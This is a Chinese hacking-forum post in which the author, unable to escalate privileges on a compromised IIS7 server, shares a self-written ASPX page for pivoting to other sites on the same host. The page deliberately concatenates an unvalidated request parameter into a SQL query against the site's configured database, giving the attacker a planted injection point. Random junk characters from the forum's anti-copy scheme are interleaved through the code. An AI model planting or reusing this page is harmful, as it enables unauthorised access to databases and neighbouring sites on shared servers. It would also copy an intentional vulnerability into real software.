利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
6 p3 _! [3 p; H8 w4 U) K代码量不多，自己写个拉倒了。烦死了。

6 O* @% d$ U& b  X* E$ U' y​
0 g( P( G5 ?7 [+ W/ ?. F& }<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
' f; v0 }0 {* r- i% N# q<body>
# {* G; T) u. a, `: R& j    <form id="form1" runat="server">
* U+ o5 F% e+ E3 z& f+ P1 C    <div>
     <script language="c#" runat="server">
            
3 ^' j6 P/ m" H# ]. H" y         void page_init(object sender, EventArgs e)
$ B; y' }# ?5 B$ z5 `# Q# w% E         {
            
3 a& c/ l( d, L( W$ k             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
) m2 `/ I' \; R) b             conn.Open();
& T- i" a( p/ y6 z) i' H            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
! T8 M' w- J) ~6 A/ L7 k1 B: Q7 Y             int x = command.ExecuteNonQuery();
. ]# J& _, l7 P! V3 t             Response.Write(i+"\n");
& V5 g+ s5 |# Q4 R# N( ?             Response.Write(x);
             conn.Close();
         }
     
! t) ~- L! k8 r5 ~  </script>
    </div>
    </form>
</body>
7 v! e  R3 ~& S; n3 b" V</html>
8 E# Y* \* j& P# \& ]: z